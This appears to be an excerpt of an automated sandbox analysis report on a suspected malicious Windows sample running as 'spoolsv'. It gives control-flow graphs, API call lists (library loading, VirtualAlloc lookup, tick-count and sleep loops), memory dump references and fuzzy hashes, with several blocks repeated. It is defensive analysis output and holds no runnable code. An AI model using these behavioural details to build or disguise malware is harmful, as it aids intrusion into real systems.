                                                                                                        control_flow_graph 25 427063-427094 lstrcpyn GetThreadLocale GetLocaleInfoA 26 427193-427199 25->26 27 42709a-42709e 25->27 28 4270a0-4270a4 27->28 29 4270aa-4270c1 lstrlen 27->29 28->26 28->29 30 4270c6-4270cc 29->30 31 4270d9-4270e2 30->31 32 4270ce-4270d7 30->32 31->26 34 4270e8-4270ef 31->34 32->31 33 4270c3 32->33 33->30 35 4270f1-42711b lstrcpyn LoadLibraryExA 34->35 36 42711d-42711f 34->36 35->36 36->26 37 427121-427125 36->37 37->26 38 427127-42715b lstrcpyn LoadLibraryExA 37->38 38->26 39 42715d-427191 lstrcpyn LoadLibraryExA 38->39 39->26
                                                                                                        APIs
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00427073
                                                                                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00427080
                                                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00427086
                                                                                                        • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 004270B1
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00427106
                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00427116
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00427142
                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00427152
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0042717C
                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 0042718C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                        • API String ID: 1599918012-2375825460
                                                                                                        • Opcode ID: 9e2ade6073610427fdacc7a77669d88accc657c9afcb484c93a8f93563c00e38
                                                                                                        • Instruction ID: 6819206e02db4054dcb3158c82514520f17620e85cdb7c91ac9952129f30eab0
                                                                                                        • Opcode Fuzzy Hash: 9e2ade6073610427fdacc7a77669d88accc657c9afcb484c93a8f93563c00e38
                                                                                                        • Instruction Fuzzy Hash: C3316471F04219BEDB15DAE8D845FEF77BD9F48304F8040A6A144E3286D6BC9E458B68

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 25 427063-427094 lstrcpyn GetThreadLocale GetLocaleInfoA 26 427193-427199 25->26 27 42709a-42709e 25->27 28 4270a0-4270a4 27->28 29 4270aa-4270c1 lstrlen 27->29 28->26 28->29 30 4270c6-4270cc 29->30 31 4270d9-4270e2 30->31 32 4270ce-4270d7 30->32 31->26 34 4270e8-4270ef 31->34 32->31 33 4270c3 32->33 33->30 35 4270f1-42711b lstrcpyn LoadLibraryExA 34->35 36 42711d-42711f 34->36 35->36 36->26 37 427121-427125 36->37 37->26 38 427127-42715b lstrcpyn LoadLibraryExA 37->38 38->26 39 42715d-427191 lstrcpyn LoadLibraryExA 38->39 39->26
                                                                                                        APIs
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00427073
                                                                                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00427080
                                                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00427086
                                                                                                        • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 004270B1
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00427106
                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00427116
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00427142
                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00427152
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0042717C
                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 0042718C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                        • API String ID: 1599918012-2375825460
                                                                                                        • Opcode ID: 9e2ade6073610427fdacc7a77669d88accc657c9afcb484c93a8f93563c00e38
                                                                                                        • Instruction ID: 6819206e02db4054dcb3158c82514520f17620e85cdb7c91ac9952129f30eab0
                                                                                                        • Opcode Fuzzy Hash: 9e2ade6073610427fdacc7a77669d88accc657c9afcb484c93a8f93563c00e38
                                                                                                        • Instruction Fuzzy Hash: C3316471F04219BEDB15DAE8D845FEF77BD9F48304F8040A6A144E3286D6BC9E458B68

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 85 4fd3a0-4fd3af GetTickCount 86 4fd3b4-4fd3c1 Sleep 85->86 87 4fd439-4fd43c 86->87 88 4fd3c3-4fd3cf 86->88 91 4fd43e-4fd448 call 4fd214 87->91 92 4fd44a-4fd44c 87->92 89 4fd437 88->89 90 4fd3d1-4fd3dc 88->90 89->87 90->89 93 4fd3de-4fd400 GetTickCount 90->93 91->92 92->86 95 4fd414-4fd420 93->95 96 4fd402-4fd412 93->96 95->89 98 4fd422-4fd432 call 4fdb20 95->98 96->95 98->89
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CountTick$Sleep
                                                                                                        • String ID: d5R$2R
                                                                                                        • API String ID: 4250438611-1222254985
                                                                                                        • Opcode ID: d904b056123a1d9a42c8539f426d4276810768050e0a054d01cb3151bd5b51bc
                                                                                                        • Instruction ID: e5119978816ca7b13e6ba1b76d2576ade974710567c4596cc4b9e47561d4b79f
                                                                                                        • Opcode Fuzzy Hash: d904b056123a1d9a42c8539f426d4276810768050e0a054d01cb3151bd5b51bc
                                                                                                        • Instruction Fuzzy Hash: FD113670B002449FE306CF6AD884E66B3E7AF99304F81C276E104873A5CB786C86D758

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 85 4fd3a0-4fd3af GetTickCount 86 4fd3b4-4fd3c1 Sleep 85->86 87 4fd439-4fd43c 86->87 88 4fd3c3-4fd3cf 86->88 91 4fd43e-4fd448 call 4fd214 87->91 92 4fd44a-4fd44c 87->92 89 4fd437 88->89 90 4fd3d1-4fd3dc 88->90 89->87 90->89 93 4fd3de-4fd400 GetTickCount 90->93 91->92 92->86 95 4fd414-4fd420 93->95 96 4fd402-4fd412 93->96 95->89 98 4fd422-4fd432 call 4fdb20 95->98 96->95 98->89
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CountTick$Sleep
                                                                                                        • String ID: d5R$2R
                                                                                                        • API String ID: 4250438611-1222254985
                                                                                                        • Opcode ID: d904b056123a1d9a42c8539f426d4276810768050e0a054d01cb3151bd5b51bc
                                                                                                        • Instruction ID: e5119978816ca7b13e6ba1b76d2576ade974710567c4596cc4b9e47561d4b79f
                                                                                                        • Opcode Fuzzy Hash: d904b056123a1d9a42c8539f426d4276810768050e0a054d01cb3151bd5b51bc
                                                                                                        • Instruction Fuzzy Hash: FD113670B002449FE306CF6AD884E66B3E7AF99304F81C276E104873A5CB786C86D758

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 40 564678-564683 41 564685-564689 40->41 42 564699-5646a8 40->42 44 564812-564816 41->44 45 56468f-564693 41->45 43 5646f1-5646f4 42->43 48 5646f6-564716 032D3B1D 032D3B02 43->48 49 5646aa-5646b0 43->49 46 56482e-564833 44->46 47 564818-56481c 44->47 45->42 45->44 47->46 52 56481e-56482b 47->52 53 56478c-564791 48->53 50 5646b2-5646ba 49->50 51 5646ec-5646ef 49->51 50->51 54 5646bc-5646bd 50->54 51->43 52->46 55 564793-5647aa 53->55 56 564718-564725 032D3B1D 53->56 57 5646bf-5646cd 54->57 60 5647ac-5647af 55->60 61 5647cb-5647d2 55->61 58 564727-564733 032D3A76 56->58 59 564735-564737 56->59 62 5646cf-5646e6 57->62 63 5646e8-5646ea 57->63 58->59 64 564789 59->64 65 564739-56473d 59->65 60->61 66 5647b1 60->66 67 5647d4-5647d7 61->67 68 5647ea-564810 call 4250a4 61->68 62->63 63->51 63->57 64->53 70 564743 65->70 71 56473f-564741 65->71 72 5647b2-5647c9 66->72 67->68 69 5647d9 67->69 68->44 73 5647da-5647e8 69->73 75 564746-564749 70->75 71->75 72->61 72->72 73->68 73->73 76 564783-564787 75->76 76->64 77 56474b-564750 76->77 78 564752-56475f 032D3B02 77->78 79 564761-564768 032D3B02 77->79 80 56476d-564773 78->80 79->80 81 564775-56477c 80->81 82 56477e 80->82 83 564780 81->83 82->83 83->76
                                                                                                        APIs
                                                                                                        • 032D3B1D.KERNEL32(kernel32.dll,VirtualAlloc,?,?,?,?,?,006D8A86,0011E000,00119000,00151F7F,00421000,00400000,00143900,00000000,00000000), ref: 00564700
                                                                                                        • 032D3B02.KERNEL32(00000000,kernel32.dll,VirtualAlloc,?,?,?,?,?,006D8A86,0011E000,00119000,00151F7F,00421000,00400000,00143900,00000000), ref: 00564706
                                                                                                        • 032D3B1D.KERNEL32(?,00000000,kernel32.dll,VirtualAlloc,?,?,?,?,?,006D8A86,0011E000,00119000,00151F7F,00421000,00400000,00143900), ref: 0056471C
                                                                                                        • 032D3A76.KERNEL32(?,?,00000000,kernel32.dll,VirtualAlloc,?,?,?,?,?,006D8A86,0011E000,00119000,00151F7F,00421000,00400000), ref: 0056472E
                                                                                                        • 032D3B02.KERNEL32(00000000,?,?,00000000,kernel32.dll,VirtualAlloc,?,?,?,?,?,006D8A86,0011E000,00119000,00151F7F,00421000), ref: 0056475A
                                                                                                        • 032D3B02.KERNEL32(00000000,00000000,?,00000000,kernel32.dll,VirtualAlloc,?,?,?,?,?,006D8A86,0011E000,00119000,00151F7F,00421000), ref: 00564768
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: VirtualAlloc$kernel32.dll
                                                                                                        • API String ID: 0-2067260499
                                                                                                        • Opcode ID: d6793612300842db5e433cdff9f002e11018828605c84afd6d13a6a167414326
                                                                                                        • Instruction ID: 8910996fa2440a084c299a82da12af2e7996832243bad71df7333c1e6ec95c12
                                                                                                        • Opcode Fuzzy Hash: d6793612300842db5e433cdff9f002e11018828605c84afd6d13a6a167414326
                                                                                                        • Instruction Fuzzy Hash: 85518C7660020A9FDB10CF68D985BAA3BB5FF96318F258254F801AB355D370EC61CF61

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 100 4047ce-407aba call 4025e0 105 407ad8 100->105 106 407abc-407ad6 100->106 107 407ae2-407b15 105->107 106->107 110 407b17-407b38 107->110 111 407b3a 107->111 112 407b44-407b75 110->112 111->112 115 407b77-407b98 112->115 116 407b9a 112->116 117 407ba4-407bc4 115->117 116->117 120 407bd3-407be1 117->120 121 407bc6 117->121 122 407be3-407bfd 120->122 123 407bff 120->123 121->120 124 407c09-407c3c 122->124 123->124 127 407c61 124->127 128 407c3e-407c5f 124->128 129 407c6b-407c97 127->129 128->129 132 407c99-407cba 129->132 133 407cbc 129->133 134 407cc6-407cf6 132->134 133->134 138 407cf8-407d19 134->138 139 407d1b 134->139 140 407d25-407d33 138->140 139->140 142 407d51 140->142 143 407d35-407d4f 140->143 144 407d5b-407d8e 142->144 143->144 147 407d90-407db1 144->147 148 407db3 144->148 149 407dbd-407deb 147->149 148->149 152 407e10 149->152 153 407ded-407e0e 149->153 154 407e1a-407e70 152->154 153->154 161 407e76-407e84 154->161 162 407f98-407fa6 154->162 165 407ea2 161->165 166 407e86-407ea0 161->166 163 407fc4 162->163 164 407fa8-407fc2 162->164 167 407fce-408001 163->167 164->167 168 407eac-407edf 165->168 166->168 175 408003-408024 167->175 176 408026 167->176 173 407ee1-407f02 168->173 174 407f04 168->174 177 407f0e-407f3c 173->177 174->177 178 408030-40805e 175->178 176->178 185 407f61 177->185 186 407f3e-407f5f 177->186 183 408060-408081 178->183 184 408083 178->184 187 40808d-4080b0 183->187 184->187 188 407f6b-407f93 185->188 186->188 195 4080b9-408110 call 40ee70 187->195 188->195 203 408112-40812c 195->203 204 40812e 195->204 205 408138-40816b 203->205 204->205 208 408190 205->208 209 40816d-40818e 205->209 210 40819a-4081c8 208->210 209->210 213 4081ca-4081eb 210->213 214 4081ed 210->214 215 4081f7-40885d call 40ee70 * 12 call 4125a0 213->215 214->215 343 4088bb-4088d6 215->343 344 40885f-4088b6 call 418c90 * 2 215->344 349 408979-408994 343->349 350 4088dc-4088f5 call 4125a0 343->350 356 408a32-408c4f call 40ee70 * 6 344->356 349->356 357 40899a-4089b3 call 4125a0 349->357 358 408937-408974 350->358 359 4088f7-408930 call 40fba0 call 415660 350->359 367 4089f5-408a18 357->367 368 4089b5-4089ee call 40fba0 call 415660 357->368 358->356 359->358 374 408a1f-408a25 367->374 368->367 374->356
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RO$;$MGH+$2$Once$S$~
                                                                                                        • API String ID: 0-884499449
                                                                                                        • Opcode ID: c8c48e953f3c1df6476fa549682d22ffb03396aa1b281a9dc8438b2c389778a3
                                                                                                        • Instruction ID: d8ffa30b5bef139f52c4a73f7c17676408c317d34ff610f7f65341f5a4a4674a
                                                                                                        • Opcode Fuzzy Hash: c8c48e953f3c1df6476fa549682d22ffb03396aa1b281a9dc8438b2c389778a3
                                                                                                        • Instruction Fuzzy Hash: B2B2FB71900218EFDB14DFA0DD48BEEBBB5FB48305F10816AE206B72A4DB745A85CF59

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 418 4250a4-4250e8 419 4250ea 418->419 420 4250ec-42511e call 424f7c 418->420 419->420 423 425120-425122 420->423 424 425127-42512e 420->424 423->424 425 425124 423->425 426 425130-425133 424->426 427 425138-42513e 424->427 425->424 426->427 428 425143-42514a 427->428 429 425140 427->429 430 425159-42515d 428->430 431 42514c-425153 428->431 429->428 432 425163 call 425034 430->432 433 425310-425323 430->433 431->430 437 425168 432->437 435 425325-425328 433->435 436 42533b-425342 433->436 435->436 438 42532a-425339 435->438 439 425344-425350 call 4251f8 call 425284 436->439 440 425355-425359 436->440 438->436 439->440 441 42535b-425362 440->441 442 425369-425372 call 424fc4 440->442 441->442 444 425364-425366 441->444 451 425374-42537b 442->451 452 42537d-425382 442->452 444->442 451->452 453 4253a0-4253a9 call 424f9c 451->453 452->453 454 425384-425394 call 427300 452->454 459 4253ab 453->459 460 4253ae-4253b2 453->460 454->453 461 425396-425398 454->461 459->460 462 4253b4 call 425254 460->462 463 4253b9-4253bc 460->463 461->453 464 42539a-42539b FreeLibrary 461->464 462->463 466 4253d8-4253e5 463->466 467 4253be-4253c5 463->467 464->453 466->440 468 4253c7 467->468 469 4253cd-4253d3 ExitProcess 467->469 468->469
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4"B$<"B
                                                                                                        • API String ID: 0-2488709930
                                                                                                        • Opcode ID: d6edd425fe0c5ab182e6e5038ed70a65a46b0eec0c5a8e1aaebca3ffb2013342
                                                                                                        • Instruction ID: 65bcb0f9bbfcf1aa0aff5c5ea0019528e461f84089a416b068b7ddcb0c1446eb
                                                                                                        • Opcode Fuzzy Hash: d6edd425fe0c5ab182e6e5038ed70a65a46b0eec0c5a8e1aaebca3ffb2013342
                                                                                                        • Instruction Fuzzy Hash: 6E41C570A00A20DFDB24DF68F8487AA7BE0BB18354F94A15FE844C7351D7B99C88DB59

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 418 4250a4-4250e8 419 4250ea 418->419 420 4250ec-42511e call 424f7c 418->420 419->420 423 425120-425122 420->423 424 425127-42512e 420->424 423->424 425 425124 423->425 426 425130-425133 424->426 427 425138-42513e 424->427 425->424 426->427 428 425143-42514a 427->428 429 425140 427->429 430 425159-42515d 428->430 431 42514c-425153 428->431 429->428 432 425163 call 425034 430->432 433 425310-425323 430->433 431->430 437 425168 432->437 435 425325-425328 433->435 436 42533b-425342 433->436 435->436 438 42532a-425339 435->438 439 425344-425350 call 4251f8 call 425284 436->439 440 425355-425359 436->440 438->436 439->440 441 42535b-425362 440->441 442 425369-425372 call 424fc4 440->442 441->442 444 425364-425366 441->444 451 425374-42537b 442->451 452 42537d-425382 442->452 444->442 451->452 453 4253a0-4253a9 call 424f9c 451->453 452->453 454 425384-425394 call 427300 452->454 459 4253ab 453->459 460 4253ae-4253b2 453->460 454->453 461 425396-425398 454->461 459->460 462 4253b4 call 425254 460->462 463 4253b9-4253bc 460->463 461->453 464 42539a-42539b FreeLibrary 461->464 462->463 466 4253d8-4253e5 463->466 467 4253be-4253c5 463->467 464->453 466->440 468 4253c7 467->468 469 4253cd-4253d3 ExitProcess 467->469 468->469
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4"B$<"B
                                                                                                        • API String ID: 0-2488709930
                                                                                                        • Opcode ID: d6edd425fe0c5ab182e6e5038ed70a65a46b0eec0c5a8e1aaebca3ffb2013342
                                                                                                        • Instruction ID: 65bcb0f9bbfcf1aa0aff5c5ea0019528e461f84089a416b068b7ddcb0c1446eb
                                                                                                        • Opcode Fuzzy Hash: d6edd425fe0c5ab182e6e5038ed70a65a46b0eec0c5a8e1aaebca3ffb2013342
                                                                                                        • Instruction Fuzzy Hash: 6E41C570A00A20DFDB24DF68F8487AA7BE0BB18354F94A15FE844C7351D7B99C88DB59

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 470 422bd0-422bf3 RtlInitializeCriticalSection 471 422bf5-422bfa RtlEnterCriticalSection 470->471 472 422bff-422c35 call 42244c * 3 LocalAlloc 470->472 471->472 479 422c77-422c8b 472->479 480 422c37 472->480 483 422c97 479->483 484 422c8d-422c92 RtlLeaveCriticalSection 479->484 481 422c3c-422c4e 480->481 481->481 485 422c50-422c70 481->485 484->483 485->479
                                                                                                        APIs
                                                                                                        • RtlInitializeCriticalSection.NTDLL(0051C5CC), ref: 00422BE7
                                                                                                        • RtlEnterCriticalSection.NTDLL(0051C5CC), ref: 00422BFA
                                                                                                        • LocalAlloc.KERNEL32(00000000,00000FF8,00000000,00422C98,?,00000000,?,004235F6,00000000), ref: 00422C24
                                                                                                        • RtlLeaveCriticalSection.NTDLL(0051C5CC), ref: 00422C92
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                        • String ID:
                                                                                                        • API String ID: 730355536-0
                                                                                                        • Opcode ID: b491cc64b7a9910419e4ab8d36c53fd1b477c0733fba9c8d54940aed9c6bdc4f
                                                                                                        • Instruction ID: 92aa11e2a0a4aba1e81e32eba7e2178d1e8dd4665264a38a8387338d13c7a394
                                                                                                        • Opcode Fuzzy Hash: b491cc64b7a9910419e4ab8d36c53fd1b477c0733fba9c8d54940aed9c6bdc4f
                                                                                                        • Instruction Fuzzy Hash: AC11E670784320BFE314EF6AE605BAD7FE5E758304F90806AE00097391C6BE6D84DA1D

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 470 422bd0-422bf3 RtlInitializeCriticalSection 471 422bf5-422bfa RtlEnterCriticalSection 470->471 472 422bff-422c35 call 42244c * 3 LocalAlloc 470->472 471->472 479 422c77-422c8b 472->479 480 422c37 472->480 483 422c97 479->483 484 422c8d-422c92 RtlLeaveCriticalSection 479->484 481 422c3c-422c4e 480->481 481->481 485 422c50-422c70 481->485 484->483 485->479
                                                                                                        APIs
                                                                                                        • RtlInitializeCriticalSection.NTDLL(0051C5CC), ref: 00422BE7
                                                                                                        • RtlEnterCriticalSection.NTDLL(0051C5CC), ref: 00422BFA
                                                                                                        • LocalAlloc.KERNEL32(00000000,00000FF8,00000000,00422C98,?,?,?,004235F6), ref: 00422C24
                                                                                                        • RtlLeaveCriticalSection.NTDLL(0051C5CC), ref: 00422C92
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                        • String ID:
                                                                                                        • API String ID: 730355536-0
                                                                                                        • Opcode ID: b491cc64b7a9910419e4ab8d36c53fd1b477c0733fba9c8d54940aed9c6bdc4f
                                                                                                        • Instruction ID: 92aa11e2a0a4aba1e81e32eba7e2178d1e8dd4665264a38a8387338d13c7a394
                                                                                                        • Opcode Fuzzy Hash: b491cc64b7a9910419e4ab8d36c53fd1b477c0733fba9c8d54940aed9c6bdc4f
